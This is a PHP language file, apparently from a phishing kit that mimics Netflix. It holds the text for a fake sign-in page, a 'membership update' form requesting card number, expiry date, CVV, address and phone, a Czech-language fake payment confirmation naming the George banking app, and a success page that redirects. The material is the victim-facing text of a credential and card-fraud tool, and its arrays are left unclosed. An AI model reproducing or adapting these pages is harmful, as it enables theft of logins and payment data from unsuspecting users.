$lg_tr = [
'head' => "Sign In",
'msg' => "<b>Incorrect email or password</b>. Please try again.",
'lbl_eml' => "Email",
'msg_eml' => "Please enter a valid email or phone number.",
'lbl_pss' => "Password",
'msg_pss' => "Your password must contain between 4 and 60 characters.",
'show_pss' => "SHOW",
'hide_pss' => "HIDE",
'remember' => "Remember me",
'help' => "Need help?",
'fb' => "Login with Facebook",
'new' => "New to Netflix?",
'signup' => "Sign up now",
'contact' => "Questions? Contact us.",
'gift' => "Gift Card Terms",
'terms' => "Terms of Use",
'privacy' => "Privacy Statement"
$info_tr = [
'signout' => "Sign out",
'update' => "Update your credit or debit card.",
'by' => "By updating your membership, you will enjoy all account advantages and benefits",
'required' => "is required!",
'fname' => "First Name",
'lname' => "Last Name",
'full_name' => "Full Name",
'adr' => "Billing Address",
'city' => "City",
'state' => "State",
'country' => "Country",
'zip' => "Zip Code",
'phone' => "Phone Number",
'cnm' => "Card Number",
'cnm_check' => "Enter a valid card credit number.",
'exp' => "Expiration Date (MM/YY)",
'csc' => "Security Code (CVV)",
'save' => "SAVE",
'csc_msg' => "Your card's security code (CVV) is the 3 or 4 digit number located on the back of most cards.",
'faq' => "FAQ",
'help_center' => "Help Center",
'cookies' => "Cookie Preferences",
'corporate' => "Corporate Information"
$vbv_tr = [
'sec' => "Zkontrolujte přes aplikaci",
'sec2' => "Potvrďte platbu v aplikaci George klíč ve Vašem mobilním telefonu, který má přístup na internet.",
'funa' => "Full Name :",
'bnk' => "Bank :",
'dat' => "Datum :",
'amo' => "Amount :",
'crd' => "Credit Card :",
'cos' => "ČAS :",
'otpc' => "Množství :",
'otp8' => "00.00CZK",
'msger' => "Potvrďte platbu prostřednictvím aplikace.",
'msger2' => "Zkontrolujte SMS a zkuste to znovu.",
'msgsf' => "The delivery charges have been paid successfully.",
'submit' => "Potvrdit"
$finish_tr = [
'step' => "STEP <b>3</b> OF <b>3 DONE</b>",
'success' => "Account Updated With Success",
'redirect' => "Your will redirected to our privacy after 5 seconds, please read the full topic.",
'bt' => "OUR PRIVACY"